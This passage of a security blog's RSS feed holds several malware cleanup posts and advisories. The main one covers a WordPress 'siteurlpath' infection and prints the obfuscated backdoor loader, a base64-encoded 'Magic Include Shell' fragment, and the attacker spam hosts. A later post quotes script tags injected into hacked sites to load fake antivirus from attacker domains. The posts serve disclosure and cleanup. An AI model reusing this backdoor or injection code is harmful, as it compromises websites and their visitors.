 $ZKb9g9=&#8221;\x2f\50\x2e\51\50\x2e\x29&#8243;;$fF6B=&#8221;3YlJXYlR2X1Zmb0NWau9&#8243;;<br />
$SH212J0g=&#8217;4x1ht1teJO+fIjr8RQGoOWFtXuBDqxzCadjGO9EcjVvq69bPPU14buBtN0d..<br />
NEO6FzZWtSyGGW/FTBs0n/NTHDdcUzlmNU4lK9dkHkXDt/ZRN59cABTSNAtMP16vXW..<br />
GWDBPxfz0Hemun9U1KfDzN+90qDvameU4y+OhbDXgYZxWNC8bsfHoRJ+yvbxy&#8230;<br />
&#8230; lots and lots more&#8230;
</p></blockquote>
<p>Inside the functions.php, at the very bottom, the following code was added to load the siteurlpath option from the database where the spam itself is hidden:</p>
<blockquote><p>
if(!isset($siteurlpath)&#038;&#038; @get_option(&#8216;siteurlpath&#8217;)){<br />
	$siteurlpath=create_function(&#8221;,(get_option(&#8216;siteurlpath&#8217;)));<br />
	$siteurlpath();<br />
}
</p></blockquote>
<p>So removing these 3 files should clean the file system for this kind of hack.</p>
<h2>Cleaning up the database</h2>
<p>Run the following query to see if your database is infected:</p>
</blockquote>
<p>&gt; select * from wp_options where option_name = &#8216;siteurlpath&#8217;;
</p></blockquote>
<p>If you see a large spill of php code in there, it means the db is infected.</p>
<p><textarea rows=15 cols=90><br />
if (!defined(&#8216;WP_RAND_CUSTOM_CT_KTT&#8217;)){<br />
	@error_reporting (0);<br />
	define(&#8216;WP_RAND_CUSTOM_CT_KTT&#8217;,'boom&#8217;);<br />
	if (function_exists(&#8216;remove_filter&#8217;)){<br />
	remove_filter(&#8216;pre_user_first_name&#8217;,'sanitize_text_field&#8217;);<br />
	remove_filter(&#8216;pre_user_first_name&#8217;,'wp_filter_kses&#8217;);<br />
	remove_filter(&#8216;pre_user_first_name&#8217;,'_wp_specialchars&#8217;,30);<br />
	remove_filter(&#8216;user_first_name&#8217;,'sanitize_text_field&#8217;);<br />
	remove_filter(&#8216;user_first_name&#8217;,'wp_filter_kses&#8217;);<br />
	remove_filter(&#8216;user_first_name&#8217;,'_wp_specialchars&#8217;,30);<br />
	remove_filter(&#8216;user_first_name&#8217;,'wp_kses_data&#8217;);<br />
}<br />
	$md5_name_cookie_shell=&#8217;f731599f55e732de772d9451dbd705a0&#8242;;//792797d03dce<br />
0fb6ce8004a506bb3577<br />
	$md5_cookie_shell=&#8217;792797d03dce0fb6ce8004a506bb3577&#8242;;//f731599f55e732de7<br />
72d9451dbd705a0<br />
	$local_param=false;<br />
..<br />
	if ($local_param){<br />
		eval(base64_decode(&#8216;Ci8qTWFnaWMgSW5jbHVkZSBTaGVsbCBieSBNYWcgaWNx<br />
IDg4NDg4OCovCiAgICAgIC8qRnJvbSBSdXNzaWEgV2l0aCBMb3ZlKi8KZXJyb3JfcmVwb3J0aW5nKDAp<br />
OwokZmV3ZXdmd2VmZXdmd2U9dHJ1ZTsKJGl0ZW1zX3Blcl9wYWdlID0gNTA7CmlmKCRmZXdld2Z3ZWZl<br />
d2Z3ZSl7CmNsYXNzIHppcGZpbGUgCnsgCiAg&#8230;</textarea></p>
<p>This code basically acts as a backdoor for the attackers and print the SPAM to everyone else. This is the beginning of the backdoor (Magic shell):</p>
<p><textarea rows=5 cols=90><br />
/*Magic Include Shell by Mag icq 884888*/<br />
      /*From Russia With Love*/<br />
error_reporting(0);<br />
$fewewfwefewfwe=true;<br />
$items_per_page = 50;<br />
if($fewewfwefewfwe){<br />
class zipfile<br />
..<br />
</textarea></p>
<p>As far as the spam, it loads them from two sites: http://wplinksforwork.com and http://hemoviestube.com.</p>
<blockquote><p>
a:2:{i:0;s:56:&#8221;http://wplinksforwork.com/561327853624756347509328/p.php&#8221;;<br />
i:1;s:54:&#8221;http://hemoviestube.com/561327853624756347509328/p.php&#8221;;}
</p></blockquote>
<p>The code is full of protection to avoid getting detected and acts as a PHP bot to infect other sites. Both sites used to manage the SPAM bots point to the same IP address and we recommend hosting companies to block them:</p>
<blockquote><p>
# host hemoviestube.com<br />
hemoviestube.com has address 95.168.177.94<br />
# host wplinksforwork.com<br />
wplinksforwork.com has address 95.168.177.94
</p></blockquote>
<p>You can see the scale of this attack by searching for these two sites on Google. You will see lots of sites generating errors when they were not able to reach the spam managers.</p>
<blockquote><p>
Warning: file_get_contents(http://wplinksforwork.com/561327853624756347509328/p.php?<br />
[function.file-get-contents]: failed to &#8230;..
</p></blockquote>
<p>We will post more details later about this attack, but this should be enough to clean up the affected sites.</p>
<hr />
<p>If your site is hacked (or contains malware), and you need help, send us an email at support@sucuri.net or visit our site: <a href="http://sucuri.net">Sucuri Security Malware Removal</a>. We can get your sites cleaned up right away.</p>
<p>Also, consider checking out our site <a href="http://sucuri.net">security monitoring</a>. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/j_vOPWdvXjoh9LZcKCPd21hvsmc/0/da"><img src="http://feedads.g.doubleclick.net/~a/j_vOPWdvXjoh9LZcKCPd21hvsmc/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/j_vOPWdvXjoh9LZcKCPd21hvsmc/1/da"><img src="http://feedads.g.doubleclick.net/~a/j_vOPWdvXjoh9LZcKCPd21hvsmc/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/0XlCRQWiwZQ" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2010/08/cleaning-the-siteurlpath-hack-on-wordpress-wplinksforwork-and-hemoviestube-spam-bots.html/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2010/08/cleaning-the-siteurlpath-hack-on-wordpress-wplinksforwork-and-hemoviestube-spam-bots.html</feedburner:origLink></item>
		<item>
		<title>UFC.com blacklisted by Google (indirectly)</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/nXm2StYFAjU/ufc-com-blacklisted-by-google-indirectly.html</link>
		<comments>http://blog.sucuri.net/2010/07/ufc-com-blacklisted-by-google-indirectly.html#comments</comments>
		<pubDate>Sat, 31 Jul 2010 23:04:24 +0000</pubDate>
		<dc:creator>dd</dc:creator>
				<category><![CDATA[blacklist]]></category>
		<category><![CDATA[ufc.com]]></category>
		<category><![CDATA[blacklisted]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=689</guid>
		<description><![CDATA[Anyone trying to visit the site UFC.com (from Google Chrome or Firefox) will get a big scary warning from Google: Warning: Visiting this site may harm your computer! The website at www.ufc.com contains elements from the site bin.clearspring.com, which appears &#8230; <a href="http://blog.sucuri.net/2010/07/ufc-com-blacklisted-by-google-indirectly.html">Read more</a>]]></description>
			<content:encoded><![CDATA[<p>Anyone trying to visit the site UFC.com (from Google Chrome or Firefox) will get a big scary warning from Google:</p>
<p><a href="http://1.bp.blogspot.com/_w4XYN7NmRts/TFSq2tPQwyI/AAAAAAAAAJA/VJeufHfkXHg/s1600/Picture+5.png" rel="lightbox"><img alt="UFC.com blacklisted" src="http://1.bp.blogspot.com/_w4XYN7NmRts/TFSq2tPQwyI/AAAAAAAAAJA/VJeufHfkXHg/s1600/Picture+5.png" title="UFc.com blacklisted" class="alignnone" width="731" height="211" /></a></p>
<blockquote><p>
Warning: Visiting this site may harm your computer!<br />
The website at www.ufc.com contains elements from the site bin.clearspring.com, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.
</p></blockquote>
<p>They are getting indirectly blacklisted because they are loading content from bin.clearspring.com (an advertising network), which is currently blacklisted by Google for having malware.</p>
<p>As far as clearspring is concerned, it seems they&#8217;ve been hacked and the attacker has added malicious code to load malware from semaniseme.com and wenmo.in. So multiple levels of indirection here to affect UFC.com users.</p>
<p>Anyone else using clearspring should remove their code from their sites until they have this blacklist issue sorted out.</p>
<p><b>To avoid getting your site blacklisted or with malware, visit <a href="http://sucuri.net">http://sucuri.net</a> to learn about our site security monitoring and malware removal solutions.</b></p>

<p><a href="http://feedads.g.doubleclick.net/~a/we-x2QBWUvVBt5qAWWrhV_1OMgc/0/da"><img src="http://feedads.g.doubleclick.net/~a/we-x2QBWUvVBt5qAWWrhV_1OMgc/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/we-x2QBWUvVBt5qAWWrhV_1OMgc/1/da"><img src="http://feedads.g.doubleclick.net/~a/we-x2QBWUvVBt5qAWWrhV_1OMgc/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/nXm2StYFAjU" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2010/07/ufc-com-blacklisted-by-google-indirectly.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2010/07/ufc-com-blacklisted-by-google-indirectly.html</feedburner:origLink></item>
		<item>
		<title>Vulnerability in Vbulletin 3.8.6</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/3hJ0RRCcSIc/vulnerability-in-vbulletin-3-8-6.html</link>
		<comments>http://blog.sucuri.net/2010/07/vulnerability-in-vbulletin-3-8-6.html#comments</comments>
		<pubDate>Wed, 21 Jul 2010 17:55:13 +0000</pubDate>
		<dc:creator>dd</dc:creator>
				<category><![CDATA[vbulletin]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=671</guid>
		<description><![CDATA[If you are running Vbulletin 3.8.6 (the latest 3.8.x version), make sure to remove the faq.php as soon as possible. A vulnerability has been found that allows anyone to retrieve the database credentials from there. The VBSEO team was quick &#8230; <a href="http://blog.sucuri.net/2010/07/vulnerability-in-vbulletin-3-8-6.html">Read more</a>]]></description>
			<content:encoded><![CDATA[<p>If you are running Vbulletin 3.8.6 (the latest 3.8.x version), make sure to remove the faq.php as soon as possible. A vulnerability has been found that allows anyone to retrieve the database credentials from there.</p>
<p>The VBSEO team was quick to react and sent the following note to their clients a little while ago:</p>
<blockquote><p>
Hello valued vBSEO customer,</p>
<p>It has come to our attention that a vulnerability on vBulletin 3.8.6<br />
has been discovered. The exploit allows a malicious user to retrieve a<br />
forum&#8217;s database credentials via the faq.php script.</p>
<p>If you are running vBulletin 3.8.6, we strongly recommend that you<br />
remove the faq.php script and change your mysql database details as a<br />
precaution.</p>
<p>You can find faq.php in your vBulletin installation directory:<br />
*/vbroot/faq.php
</p></blockquote>
<p><b>Update: Patch available <a href="http://www.vbulletin.com/forum/showthread.php?357818-Security-Patch-Release-3.8.6-PL1&#038;p=2012907#post2012907">here</a>.</b></p>
<p>It seems that a patch is coming very soon too. Some discussion about this issue <a href="http://www.vbulletin.com/forum/showthread.php?357801-Mega-exploit-in-3.8.6&#038;p=2012778">here</a>. Thanks to <a href="http://under-linux.org">Marcus Maciel</a> for the heads up.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/7Q5svel8iGeDz5kfZO4hncfX1EI/0/da"><img src="http://feedads.g.doubleclick.net/~a/7Q5svel8iGeDz5kfZO4hncfX1EI/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/7Q5svel8iGeDz5kfZO4hncfX1EI/1/da"><img src="http://feedads.g.doubleclick.net/~a/7Q5svel8iGeDz5kfZO4hncfX1EI/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/3hJ0RRCcSIc" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2010/07/vulnerability-in-vbulletin-3-8-6.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2010/07/vulnerability-in-vbulletin-3-8-6.html</feedburner:origLink></item>
		<item>
		<title>Yet another series of attacks – This time using whereisdudescars.com</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/fQIfwuW_Wgg/yet-another-series-of-attacks-this-time-using-whereisdudescars-com.html</link>
		<comments>http://blog.sucuri.net/2010/07/yet-another-series-of-attacks-this-time-using-whereisdudescars-com.html#comments</comments>
		<pubDate>Sat, 17 Jul 2010 05:41:35 +0000</pubDate>
		<dc:creator>dd</dc:creator>
				<category><![CDATA[hacked]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=662</guid>
		<description><![CDATA[Update 1: It seems that this attack is limited to only Bluehost and Dreamhost, not GoDaddy like in the previous times. Update 2: This script should fix/clean an infected site: site fix.php Update 3: Attackers are using nowisisdudescars.com and onlineisdudescars.com &#8230; <a href="http://blog.sucuri.net/2010/07/yet-another-series-of-attacks-this-time-using-whereisdudescars-com.html">Read more</a>]]></description>
			<content:encoded><![CDATA[<p><b>Update 1: It seems that this attack is limited to only Bluehost and Dreamhost, not GoDaddy like in the previous times.</b><br />
<b>Update 2: This script should fix/clean an infected site:  <a href="http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-the-latest-wordpress-hack.html">site fix.php</a></b><br />
<b>Update 3: Attackers are using nowisisdudescars.com and onlineisdudescars.com as well.</b></p>
<p>We&#8217;re tracking another series of attacks affecting many web sites (WordPress seems to be the target application so far).  This time they&#8217;re using whereisdudescars.com as the attacking site and adding the following javascript to the web sites:</p>
<blockquote><p>
&lt;script src=&quot; http://whereisdudescars.com/js2.php&quot;&gt;&lt;/script&gt;</p>
<p>&lt;script src=&quot; http://nowisisdudescars.com/js.php
</p></blockquote>
<p>This code then loads another javascript from http://www4.realprotection36.co.cc attempting to push the &#8220;Fake Anti virus&#8221;  virus to the visitor of the site.<br />
<span id="more-662"></span><br />
What is interesting is the people behind this <a href="http://sucuri.net/malware/entry/MW:MROBH:3">attack</a>. Do you remember the <a href="http://blog.sucuri.net/2010/05/continuing-attacks-at-godaddy-losotrana-com.html">losotrana</a> attack amongst the various others we&#8217;ve discussed in the past few months? Well, the people involved in this one are the same. Check out the WHOIS contact info for whereisdudescars.com:</p>
<blockquote><p>
Domain name: whereisdudescars.com</p>
<p>Registrant Contact:<br />
   HardSoft, inc<br />
   Hilary Kneber hilarykneber@yahoo.com<br />
   7569468 fax: 7569468<br />
   29/2 Sun street. Montey 29<br />
   Virginia NA 3947<br />
   us
</p></blockquote>
<p>It&#8217;s the same hilarykneber@yahoo.com that registered losotrana.com, holasionweb.com and others. We&#8217;re still researching the exploit vector, and we&#8217;ll post more details when we have them.</p>
<hr />
<p>If you&#8217;re having difficulties getting your site cleaned up, send us an email to contact@sucuri.net or visit our site: <a href="http://sucuri.net">sucuri.net</a>. We can get your sites clean up right away.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/mVzoq_HtWMKjUzenfBO98WH8ZzA/0/da"><img src="http://feedads.g.doubleclick.net/~a/mVzoq_HtWMKjUzenfBO98WH8ZzA/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/mVzoq_HtWMKjUzenfBO98WH8ZzA/1/da"><img src="http://feedads.g.doubleclick.net/~a/mVzoq_HtWMKjUzenfBO98WH8ZzA/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/fQIfwuW_Wgg" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2010/07/yet-another-series-of-attacks-this-time-using-whereisdudescars-com.html/feed</wfw:commentRss>
		<slash:comments>9</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2010/07/yet-another-series-of-attacks-this-time-using-whereisdudescars-com.html</feedburner:origLink></item>
	</channel>
</rss><!-- Dynamic page generated in 0.403 seconds. --><!-- Cached page generated by WP-Super-Cache on 2010-09-02 18:07:52 -->
